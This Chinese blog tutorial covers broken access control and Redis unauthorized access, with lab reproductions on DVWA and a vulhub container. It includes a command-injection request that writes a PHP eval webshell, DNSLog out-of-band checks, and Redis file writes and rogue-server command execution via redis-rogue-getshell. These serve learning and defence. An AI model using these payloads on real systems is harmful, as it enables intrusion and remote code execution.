失效的访问控制及漏洞复现

已于 2023-09-06 09:25:58 修改
阅读量1.8k 收藏 9
点赞数 10
分类专栏: Web漏洞原理 文章标签: 网络安全 网络 安全 系统安全
于 2023-09-01 21:00:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58783105/article/details/132630611
版权
本文探讨了Web应用中失效的访问控制漏洞,如OWASPTOP10中的A5和A01,涉及水平越权和垂直越权实例。特别关注了Redis的未授权访问,通过案例展示了如何利用CommandInjection和执行系统命令。强调了数据泄露和防御措施的重要性。
摘要由CSDN通过智能技术生成

文章目录

渗透测试漏洞原理

失效的访问控制

在这里插入图片描述

1. 失效的访问控制

应该对Web 应用(系统等)实施访问控制策略,限定不同用户的不同权限(访问范围)。如果没控制住,就意味着访问控制失效。

1.1 OWASP TOP 10

1.1.1 A5:2017-Broken Access Control

​ 未对通过身份验证的用户实施恰当的访问控制。攻击者可以利用这些缺陷访问未经授权的功能或数据,例如:访问其他用户的帐户、查看敏感文件、修改其他用户的数据、更改访问权限等。

1.1.2 A01:2021-Broken Access Control

​ 访问控制强制实施策略,使用户无法在其预期权限之外进行操作。失败的访问控制通常会导致未经授权的信息泄露、修改或销毁所有数据、或在用户权限之外执行业务功能。

1.2 失效的访问控制类别

权限移动方向

1.2.1 水平越权

同级别账户中横向移动。

web应用

1.2.2 垂直越权

普通用户获取管理员权限。

操作系统漏洞提权

1.3 攻防案例

1.3.1 DVWA越权
POST /dvwa_2.0.1/vulnerabilities/exec/source/low.php HTTP/1.1 
Host: 192.168.111.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.111.15/dvwa_2.0.1/vulnerabilities/exec/source/
Connection: close
Upgrade-Insecure-Requests: 1 
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded 
Content-Length: 77

ip=127.0.0.0.1|echo+"<?php+@eval($_REQUEST[777])?>"+>+shell.php&Submit=Submit

ctrl+u:url编码

实验:DVWA靶场中的Command Injection为例

Low级别的源码路径如下

image-20230901155516774

查看源码

image-20230901155852511

退出DVWA靶场

image-20230901155613045

然后访问Low.php该文件的路径,使用bp抓取数据包

image-20230901155734968

删除Cookie数据,因为Cookie携带者身份信息。

转换为POST提交方式,因为源码中是Post提交。

image-20230901155947878

执行命令calc

calc:表示计算器

如果命令执行成功那么在服务器端就会弹出计算器

在这里插入图片描述

并且在执行完命令后,页面并没有回显。

问题:那么既然没有回显,是如何验证该漏洞是否存在?

方式一:在当前页面新建文件,如果文件创建成功,证明漏洞存在。

image-20230901161301402

说明:由于有特殊字符使用快捷键ctrl+u进行URL编码

image-20230901161249469

方式二:由于创建文件的动作过大可以使用平台的方式。

网站链接入下:DNSLog Platform

先创建一个域名

image-20230901161815930

使用域名解析:

nslookup mya6wo.dnslog.cn

image-20230901162010413

如何页面中产生解析记录,代表我们的命令执行成功。从而证明该漏洞的存在。

image-20230901162027321

既然漏洞存在我们可以尝试创建一个一句话木马文件。

echo "<?php @eval($_REQUEST[777])?>" > shell.php

image-20230901162652035

上传成功

在这里插入图片描述

蚁剑链接成功

http://192.168.188.183/dvwa/vulnerabilities/exec/source/shell.php

image-20230901162927883

虚拟终端

image-20230901162957644

1.4 相关漏洞

1.4.1 目录遍历

​ 目录穿越,目录遍历,Directory Traversal。Web用户,通过某种方式,可以访问Web根目录以外的文件,甚至执行系统命令。

造成目录遍历漏洞的原因:

  • 文件包含

  • 文件读取

  • RCE

1.4.2 未授权访问

​ 未授权访问(Unauthorized Access),重要资产根本没有做访问控制限制,导致黑客攻击者可以在没有授权的情况下操作重要资产,包括读写文件,执行命令等敏感操作。

这个漏洞比较倾向于数据库的相关问题。

1.5 总结

失效的访问控制漏洞:

  1. 漏洞描述:失效的访问控制漏洞是指系统在实施访问控制策略时出现错误或缺陷,导致攻击者能够绕过或越权访问敏感资源。这些错误可能包括缺乏有效的身份验证、授权检查不完整或不正确配置的访问控制列表(ACL)等。
  2. 漏洞场景:失效的访问控制漏洞通常存在于需要对用户身份验证、会话管理、文件或目录访问控制以及其他敏感操作进行控制的应用程序或系统中。例如,一个电子商务网站可能存在允许未经授权的用户访问订单信息的漏洞。
  3. 漏洞原理:失效的访问控制漏洞的原理在于系统未能正确实施访问控制策略。这可能是由于设计错误、实现缺陷或配置错误等导致的。例如,一个系统可能没有正确验证用户的身份,允许未经授权的用户获得访问权限。
  4. 漏洞危害:失效的访问控制漏洞可能导致严重的安全威胁。以下是一些可能的危害:
    • 数据泄露:攻击者可以访问敏感数据,如用户个人信息、信用卡号码等。
    • 数据篡改:攻击者可能修改数据,影响数据的完整性和可靠性。
    • 越权访问:攻击者可以获得比其正常权限更高的访问权限,例如管理员权限。
    • 服务拒绝:攻击者可能通过滥用访问控制缺陷来拒绝合法用户的服务。
  5. 漏洞验证:验证失效的访问控制漏洞通常需要模拟攻击者的行为并尝试绕过系统的访问控制策略。这包括使用未经授权的身份验证、尝试越权访问或进行非法操作等方式,以检测系统是否容易受到此类漏洞的利用。
  6. 利用方法:攻击者利用失效的访问控制漏洞可能采取多种方法:
    • 绕过身份验证:攻击者可能利用系统设计或实现缺陷,绕过身份验证机制,获得未经授权的访问权限。
    • 直接访问敏感资源:攻击者可以直接通过URL或其他方式访问敏感资源,而不需要经过任何授权检查。
    • 水平越权:攻击者使用合法用户的身份,但越过了其权限范围,访问其他用户的资源。
    • 垂直越权:攻击者以低权限用户的身份,尝试通过利用系统漏洞或错误配置来提升其权限。
  7. 漏洞防御:为了防止失效的访问控制漏洞的出现,可以采取以下防御措施:
    • 实施完整的身份验证和会话管理机制,确保仅经过身份验证且有授权的用户能够访问系统。
    • 严格限制资源访问权限,并定期审查和更新访问控制列表(ACL)。
    • 对敏感操作和数据进行额外的保护,例如使用多因素身份验证、加密等措施。
    • 定期进行安全审计和漏洞扫描,及时修复和更新系统中的安全问题。
    • 参考访问控制的最佳实践和安全框架来指导系统设计和开发过程。

综上所述,失效的访问控制漏洞可能对系统安全性造成严重威胁。了解其描述、场景、原理、危害、验证方法、利用方式和防御措施是确保系统安全的重要一步。及时发现和修复这些漏洞,以保护系统和用户的数据安全。

2. 未授权访问

2.1 Redis未授权访问

2.1.1 Redis 介绍

Rdis是非关系型数据库系统,没有库表列的逻辑结构,仅仅以键值对的方式存储数据。

Redis数据库经常用于Web应用的缓存。

Redis可以与文件系统进行交互。

Redis监听TCP/6379

Redis数据库默认端口:6379

2.1.2 Redis 简单使用

Redis 未设置密码,客户端工具可以直接链接。

┌──(ajest�� zh-CN)-[~/vulhub/vulhub/redis/4-unacc]
└─$ redis-cli -h 127.0.0.1 127.0.0.1:6379> set name WUHU OK
127.0.0.1:6379> get name "WUHU"
127.0.0.1:6379> config set dir /tmp/
OK
127.0.0.1:6379> config set dbfilename ajest.txt OK
127.0.0.1:6379> save OK
127.0.0.1:6379>
2.1.3 Redis 未授权访问
读取数据库内容读写系统文件执行系统命令
数据泄露直接写WebShell
计划任务反弹Shell
SSH免密登录		redis-rogue-getshell

2.2 经典案例

image-20230901164207685

启动镜像

image-20230901164226020

服务启动后,通过以下方法在没有凭据的情况下连接到此服务器

redis-cli -h 127.0.0.1

-h:表示连接本机的redis数据库。

image-20230901164524685

并且直接可以看到服务器的信息

image-20230901164610699

Redis数据库还可以读写文件

执行如下命令:

set name xjj

config set dir /tmp/		

config set dbfilename wuhu.txt 

save

将数据库中的内容存储在tmp目录下的wuhu.txt文件中。

image-20230901165143856

因为连接的是Docker容器的Redis数据库,登录到Docker容器中查看该文件是否存在。

sudo docker exec -it 4447cf636b92 /bin/bash

it后面根容器的ID值

image-20230901165353417

查看wuhu.txt

在这里插入图片描述

这样Redis数据库就存在数据泄露。

2.2.1 执行系统命令

下载脚本

proxychains git clone https://github.com/vulhub/redis-rogue-getshell.git

先编译

cd RedisModulesSDK
make

执行命令

python3 redis-master.py -r 127.0.0.1 -p 6379 -L 192.168.188.185 -P 8888 -f RedisModulesSDK/exp.so -c "id"

image-20230901173655689

更换双引号内容的命令,就实现了漏洞的利用。

漏洞检测工具:github链接地址

启动方式:

python3 unauthorized_com.py -i 127.0.0.1

image-20230901203508800

来日可期x
关注
  • 10
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
失效访问控制漏洞复现实战
yuan_boss的博客
09-01 947
什么是失效访问控制失效访问控制有哪些种类?失效访问控制的场景是什么样子的?这篇文章复现漏洞的流程是怎么样的?什么是失效访问控制?​ 失效访问控制,其实就是系统对一些功能点做了访问限制或者权限的限制,但是由于程序开发时因各方面因素导致的缺陷,使这些限制并没有生效,从而产生了失效访问控制漏洞失效访问控制有哪些种类?水平越权:在同级别账户中横向移动。垂直越权:普通用户获取管理员权限。失效访问控制的场景是什么样子的?
2021 OWASP TOP 1: 失效访问控制
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
07-07 6871
2022 OWAP TOP 1 学习总结,什么是失效访问控制?包含了哪些漏洞
[渗透测试] 失效访问控制
最新发布
Da1NtY的博客
06-29 984
不同用户具有不同的权限,如果权限控制失效,则叫做。未对通过身份验证的用户实施恰当的访问控制。攻击者可以利用这些缺陷访问未经授权的功能或数据,例如:访问其他用户的账户、查看敏感文件、修改其他用户的数据、更改访问权限等。访问控制强制实施策略,使用户无法在其预期权限之外进行操作。失败的访问控制通常会导致未经授权的信息泄露、修改或销毁所有数据、或在用户权限之外执行业务功能。
你必须知道的十大漏洞失效访问控制
IE-lab网络实验室的博客
07-21 713
在更新前A1的位置曾属于注入攻击,就是大家都熟悉的SQL注入等,但随着安全技术的发展,有安全意识的厂商都会对代码进行实体化,避免此类漏洞出现,并且更新后的top10也对其在更广的意义上进行了覆盖,并命名为权限控制失效(BrokenAccessControl)与之前大不相同,权限控制失效更像是我们所说的越权,攻击者会通过各种手段去提升自己的权限。是指攻击者在拥有用户A权限的情况下,水平获取到用户B的权限进行越权操作。是指攻击者将普通用户的权限提升至管理员用户权限对系统进行越权操作;...
失效访问控制
热门推荐
Breeze的博客
08-16 1万+
失效访问控制 出现的问题 文件包含/目录遍历 权限绕过(越权) 权限提升(提权) 不安全直接对象的引用 访问控制的(防御)思路 基于角色的访问控制(RBAC) 自由访问控制(DAC) 强访问控制(MAC) 基于权限的访问控制 访问控制验证要求 失效访问控制 这是我在OWASP上几篇文章翻译整理加删减总结出的一个关于失效访问控制的检查可解决的文章。勉强算个原创...
A5 失效访问控制
weixin_43355264的博客
01-17 1204
失效访问控制访问控制的利用是渗透测试人员的一项核心技能。SAST工具和DAST工具可以检测到访问控制的缺失,但不能验证其功能是否正常访问控制可通过手动方式检测,或在某些特定框架下通过自动化检测访问控制缺失。 访问控制检测通常不适用于自动化的静态或动态测试。手动检测是检测访问控制缺失或失效的最佳方法。包括:HTTP方法、控制器、直接对象引用等。 技术影响是攻击者可以冒充用户、管理员或拥有...
Web安全之OWASP TOP10漏洞
m0_64481831的博客
03-09 1264
简单点说,OWASP概括了“10项最严重的Web应用程序安全风险列表”,总结了Web应用程序最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。OWASP每四年发布一次,现在最新的OWASP是由2021年公布的。
新华制药内部控制失效案例分析PPT课件.ppt
04-24
新华制药内部控制失效案例分析,新华制药内部控制失效案例分析课件,新华制药内部控制失效案例分析PPT
jquery radio 动态控制选中失效问题的解决方法
10-18
总的来说,解决jQuery radio动态控制选中失效问题的关键在于理解`attr`和`prop`的区别,并根据jQuery的版本选择正确的方法。在1.6及以上版本中,使用`prop`方法设置`checked`属性,可以有效避免选中失效的问题。同时...
动力电池电芯及BMS安全失效模式分析
01-14
一、电芯安全失效模式分析及技术保障措施  1.电芯内部正负极短路,生产设备保障能力是关键  直接原因:电芯生产过程中有缺陷导致或因为长期振动外力使电芯变形所致。  失效分析:生产过程中电芯内部正负极短路...
PHP3 safe_mode 失效漏洞
12-17
【PHP3 safe_mode 失效漏洞】是针对PHP 3.0版本的一个重大安全问题。PHP是一种广泛使用的HTML内嵌式脚本语言,它的语法深受C、Java和Perl的影响,使得开发人员能够快速构建动态网站。然而,由于PHP运行在web服务器上...
设计失效模式及效应分析DFMEA
04-17
An FMEA can be described as a systemized group of activities intended to: 失效模式及效应分析是一组有系统的行为, 其目的是: Recognize and evaluate the potential failure of a product/process and its ...
介绍车身控制模块中的失效保护方法
01-19
在今天的车身控制模块(BCM)设计中,有见识的工程师机都尽可能不再使用机电式继电器。BCM具有以下发展趋势:越来越多的车身电子设备在车身得到应用,使得BCM控制对象更多;各电子设备的功能越来越多,各种功能都...
芯片验证测试及失效分析
11-02
本文对验证测试与失效分析技术进行了系统介绍,包括验证测试的一般流程、常用的分析方法以及基于验证测试的失效分析。通过分析集成电路设计和制造工艺的发展给测试带来的影响,简要介绍了验证测试面临的挑战以及未来...
分布式访问控制模型中节点级联失效研究.pdf
08-08
#资源达人分享计划#
【WEB漏洞原理】失效访问控制_失效访问控制(1)
2301_76328475的博客
04-12 620
Redis 是非关系型数据库系统,没有库表列的逻辑结构,仅仅以键值对的方式存储数据Redis 数据库经常用于Web 应用的缓存Redis 可以与文件系统进行交互Redis 监听TCP/6379。
访问控制/越权漏洞 -- 学习笔记
angry_program的博客
08-22 4940
访问控制概念 简单的来说就是应用程序首先会判断用户的身份(账号密码登录),随后确认后续请求是否由该用户发出(会话管理),然后判断是否允许用户执行“所请求的操作”或访问“所请求的资源(访问控制)” 1、从用户角度访问控制模型分为以下类型: 垂直访问控制:控制不同权限等级的用户访问应用程序不同的功能;如“管理员”可以修改/删除账号,而普通账号无法操作。 水平访问控制:控制用户只能访问自己的资源,而不能访问其他用户相同类型的资源;如“银行程序用户只能从自己的账号进行付款,而不能查看其他用户的账户”。 上
访问控制漏洞和权限提升 | PortSwigger(burpsuite官方靶场)| Part 1
bin789456的博客
03-18 4431
写在前面 一些概念会直接引用,主要是对于靶场和关键知识点会进行讲解。 靶场链接 资料引用 访问控制概念 简单的来说就是应用程序首先会判断用户的身份(账号密码登录),随后确认后续请求是否由该用户发出(会话管理),然后判断是否允许用户执行“所请求的操作”或访问“所请求的资源(访问控制)” 1、从用户角度访问控制模型分为以下类型: 垂直访问控制:控制不同权限等级的用户访问应用程序不同的功能;如“管理员”可以修改/删除账号,而普通账号无法操作。 水平访问控制:控制用户只能访问自己的资源,而不能访问其他用户相同
失效访问控制的应对方案和解决办法
04-21
失效访问控制是指用户在授权期间结束之后仍然可以继续访问系统资源。为了防止此类安全漏洞,应采取以下方案和解决办法: 1.建立合适的访问控制策略,以确保授权期限的正确管理。 2.使用无状态令牌,如JWT(JSON Web Token)等,以便在令牌失效时立即停止对资源的访问。 3.采用定期令牌刷新机制,确保用户访问资源时使用的是最新的令牌。 4.实现监控和日志管理功能,能够追踪和记录用户访问活动,及时发现异常访问行为。 5.严格控制系统权限,合理分配用户权限,防止过度授权。 6.采用多因素认证等高级认证方式,提高安全性。 希望以上方案和解决办法能够对您有所帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

来日可期x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值